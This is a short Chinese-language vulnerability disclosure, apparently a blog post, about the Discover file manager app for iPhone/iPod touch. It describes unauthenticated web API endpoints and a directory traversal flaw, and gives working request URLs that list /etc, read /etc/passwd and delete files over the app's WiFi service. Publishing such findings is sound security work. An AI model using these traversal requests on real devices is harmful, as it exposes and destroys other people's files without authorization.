discover是iphone/ipod touch平台上流行的文件管理器,可以阅读pdf/office/txt等格式的文件,并通过wifi分享这些文件,详细的介绍看这:http://itunes.apple.com/us/app/discover/id292416855?mt=8#。
漏洞分析
当wifi环境下的iphone/ipod touch用户打开discover时,会自动开启远程web访问,web界面是flash制作的文件管理界面(如下图),discover有两种目录:Private与Public,在“设置”–>“文件安全设置”中可以设置web访问密码(认证类型为HTTP Digest),不过仅保护Private目录。
由于discover web服务的一些api接口没有严格认证用户访问并且存在目录穿越漏洞,导致攻击者利用这些web服务api可以访问iphone/ipod(mobile用户权限)上的任意目录与文件,并且可以删除mobile权限可删除的文件。
漏洞利用
1、首先我们来列目录:
http://192.168.1.9:8888/list?sort=%27&format=xml&dir=/Public/../../../../../../../etc/&order=asc
2、读文件内容,虽然我知道我们的权限仅仅是mobile,但是读的权限还是很广的:
http://192.168.1.9:8888/web?path=history/../../../../../../../../etc/passwd
还有一个delete api: http://192.168.1.9:8888/delete?path=/Private/&format=none
漏洞厂商
http://www.mappn.com/community/
0 条评论。